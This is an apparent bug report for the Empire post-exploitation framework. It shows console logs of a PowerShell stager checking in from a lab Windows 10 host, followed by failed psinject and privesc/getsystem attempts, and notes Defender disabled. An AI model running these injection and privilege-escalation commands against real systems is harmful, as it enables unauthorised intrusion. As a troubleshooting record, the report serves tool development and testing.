Empire
Process injection (psinject not working)
Empire Version
- 2.5
OS Information (Linux flavor, Python version)
- Linux KaliLinuxVM 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 GNU/Linux
- Python 2.7.16rc1
- Microsoft Windows 10 Education - Version 10.0.15063 Build 15063
- PowerShell 5.1 - Build 15063 revision 1689
Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
An Empire agent running as Administrator cannot inject into another process with psinject. Furthermore, if I try to obtain SYSTEM, it fails as well.
Screenshot of error, embedded text output, or Pastebin link to the error
Process injection
(Empire: stager/multi/launcher) > [*] Sending POWERSHELL stager (stage 1) to 192.168.228.131
[*] New agent 5HA8W4T6 checked in
[+] Initial agent 5HA8W4T6 from 192.168.228.131 now active (Slack)
[*] Sending agent (stage 2) to 5HA8W4T6 at 192.168.228.131
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
5HA8W4T6 ps 192.168.228.131 DESKTOP-P8PBRLM *DESKTOP-P8PBRLM\Sherlo powershell 5768 5/0.0 2019-03-27 12:59:11
(Empire: agents) > interact 5HA8W4T6
(Empire: 5HA8W4T6) > psinject http80 explorer
[*] Tasked 5HA8W4T6 to run TASK_CMD_JOB
[*] Agent 5HA8W4T6 tasked with task ID 1
[*] Tasked agent 5HA8W4T6 to run module powershell/management/psinject
(Empire: 5HA8W4T6) > [*] Agent 5HA8W4T6 returned results.
Job started: H6F8Y4
[*] Valid results returned by 192.168.228.131
(Empire: 5HA8W4T6) >
Get-System
(Empire: 5HA8W4T6) > usemodule privesc/getsystem*
(Empire: powershell/privesc/getsystem) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 5HA8W4T6 to run TASK_CMD_WAIT
[*] Agent 5HA8W4T6 tasked with task ID 2
[*] Tasked agent 5HA8W4T6 to run module powershell/privesc/getsystem
(Empire: powershell/privesc/getsystem) > [*] Agent 5HA8W4T6 returned results.
error running command: Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
[*] Valid results returned by 192.168.228.131
(Empire: powershell/privesc/getsystem) >
Any additional information
- Empire HTTP listener - no encryption
- Defender is turned off on Windows
- Started a PowerShell instance as Administrator to execute the Empire multi/launcher payload.
Fixed in 3.0-Beta branch (883ee661d1bbc72920102054e8bba00515bff9e0)